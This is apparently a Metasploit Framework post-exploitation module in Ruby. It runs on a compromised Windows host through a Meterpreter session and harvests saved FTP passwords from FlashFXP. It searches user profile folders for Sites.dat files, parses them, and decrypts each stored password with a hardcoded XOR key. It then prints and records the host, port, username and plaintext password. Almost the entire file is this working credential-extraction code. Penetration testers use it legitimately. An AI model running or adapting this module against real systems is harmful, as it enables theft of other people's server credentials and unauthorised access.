metasploit-framework/modules/post/windows/gather/enum_flashfxp_pwd.rb

116 lines
3.2 KiB
Ruby

# $Id$
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'rex/parser/ini'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather FlashFXP Saved Password Extraction',
'Description' => %q{ This module extracts weakly encrypted saved FTP Passwords
from FlashFXP. It finds saved FTP connections in the Sites.dat file. The
passwords are saved in a weakly encrypted format which this module will
decrypt. },
'License' => MSF_LICENSE,
'Author' => [ 'TheLightCosine <thelightcosine@gmail.com>'],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
@fxppaths = []
@userpaths = []
os = session.sys.config.sysinfo['OS']
drive = session.fs.file.expand_path("%SystemDrive%")
if os =~ /Windows 7|Vista|2008/
@appdata = '\\AppData\\Roaming\\FlashFXP\\'
@users = drive + '\\Users'
@userpaths << drive + '\\ProgramData\\FlashFXP\\'
else
@appdata = '\\Application Data\\FlashFXP\\'
@users = drive + '\\Documents and Settings'
end
get_users()
@userpaths.each{|up| get_ver_dirs(up)}
@fxppaths.each do |fxp|
get_ini(fxp)
end
end
def get_users
session.fs.dir.foreach(@users) do |path|
next if path =~ /^(\.|\.\.|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
@userpaths << "#{@users}\\#{path}\\#{@appdata}\\"
end
end
def get_ver_dirs(path)
begin
session.fs.dir.foreach(path) do |sub|
next if sub =~ /^(\.|\.\.)$/
@fxppaths << "#{path}#{sub}\\Sites.dat"
end
rescue
print_status("The following path could not be accessed or does not exist: #{path}")
end
end
def get_ini(filename)
begin
config = client.fs.file.new(filename,'r')
parse = config.read
ini = Rex::Parser::Ini.from_s(parse)
if ini == {}
print_status("Unable to parse file, may be encrypted using external password: #{filename}")
end
ini.each_key do |group|
host = ini[group]['IP']
username = ini[group]['user']
epass = ini[group]['pass']
port = ini[group]['port']
next if epass == nil or epass == ""
passwd = decrypt(epass)
print_good("*** Host: #{host} Port: #{port} User: #{username} Password: #{passwd} ***")
report_auth_info(
:host => host,
:port => port,
:sname => 'FTP',
:user => username,
:pass => passwd
)
end
rescue
print_status("Either could not find or could not open file #{filename}")
end
end
def decrypt(pwd)
key = "yA36zA48dEhfrvghGRg57h5UlDv3"
pass = ""
cipher = [pwd].pack("H*")
(0..(cipher.length)-2).each do |index|
xored = cipher[index + 1,1].unpack("C").first ^ key[index,1].unpack("C").first
if ((xored - cipher[index,1].unpack("C").first < 0))
xored += 255
end
pass << (xored - cipher[index,1].unpack("C").first).chr
end
return pass
end
end